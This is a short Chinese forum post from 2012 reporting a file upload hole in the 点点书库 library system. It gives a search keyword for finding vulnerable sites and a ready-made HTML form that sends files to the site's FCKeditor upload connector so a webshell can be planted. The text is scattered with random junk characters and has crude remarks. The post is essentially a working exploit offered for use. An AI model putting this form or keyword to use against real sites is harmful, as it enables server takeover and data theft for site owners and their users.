主题:图书馆系统任意文件上传漏洞2 i+ U4 D' K7 p6 m: Z1 l
作者:冰锋刺客+ y/ _- n7 c8 t) M1 t
厂商:点击书(dianjishu.com)
3 H& x" Y9 ^* \' Q+ x( X! | 日期:2012-6-21' N4 t' T+ Z5 o- l4 {( S1 }5 z) T
) C# g( Q& ~; b8 z dI 概述
' ^; ~# t% z! L 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell. [0 @) Y$ W0 q6 S2 X! k
II 简介
3 z q& K$ g0 s 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
7 d+ K# T' T: {# G d! [1 z 补充一个漏洞
( h" \% M; R) m1 _6 H4 f: ^( l& { <form id="frmUpload" enctype="multipart/form-data"
9 f( N1 k- G( k. t5 G$ r action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>& H1 s* h, x2 O2 c/ b+ D* Q: Z& B
<input id="btnUpload" type="submit" value="操翻他">
6 d. r3 p* e0 K8 J$ T: O </form>$ d: }4 f4 F4 y8 z
你们懂的$ d+ {0 W4 i* e
那傻逼提供还需要改包.6 B% `* o' x0 h r
自己看了下源代码发现fckeditor
9 I/ [: K( d. r 直接秒杀5 S8 _6 H5 d, |$ i4 M
|
发表于 2012-9-10 21:20:59
收藏
支持
反对